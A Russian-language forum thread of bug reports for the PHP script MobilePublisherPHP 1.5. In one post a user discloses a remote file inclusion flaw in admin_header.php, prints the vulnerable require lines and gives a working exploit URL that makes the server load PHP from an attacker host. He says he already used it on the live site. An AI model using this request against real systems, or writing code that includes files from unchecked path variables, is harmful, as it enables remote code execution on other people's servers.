Наши скрипты > MobilePublisherPHP

v 1.5 Final. Обсуждение багов и предложений

<< < (4/5) > >>

Dagger:
Хочу отметить такой баг: теймплейт comments_form нельзя изменить.

manicon:
Bylo by neploxo esli mozhno budet menjat k kakomu razdelu prenadlezhit statja...

o4enj polezno

petrenko.com.ua:
Это предложение по улучшению?

ROFL:
Здравствуйте.
При инсталяции необходимо что-бы в PHP.ini  были отключены
register_global=off

Иначе возникает серьезная брешь в безопасности.
так, например, появляется  возможность выполнить произвольный PHP code переписав пути к заголовочным файлам

Example:

In file admin_header.php

--------------------cut----------------------

$starttime = $mtime1[1] + $mtime1[0];
require $abspath."/functions.php";
require $abspath."/db/$database.php";
$version = "1.5 RC2";

------------------cut--------------------------

просто делаем запрос типа

http://mp.webscript.ru/admin_header.php?abspath=http://haker.site/
и при исполнение скрипта будет сделана попытка подключить
файл http://haker.site/functions.php, что приведет к исполнению чужого PHP кода.

admin_header.php - это не единственный файл с подобными путями, есть и др. ну это уже не моя забота.

Как доказательство я оставил свой комментарий на главной страничке :)

С уважением @ROFL

Dagger:
Если говорить в целом о предложениях и багах, то скрипт очень нестабилен. Постоянно что-то накрывается и приходится вылавливать баги. Я уже вырезал таблицу counter2 и все обращения к ней из-за какой-то ошибки мешающей нормальной работе. А задумка замечательная - то что нужно.

Навигация

[0] Главная страница сообщений

[#] Следующая страница

[*] Предыдущая страница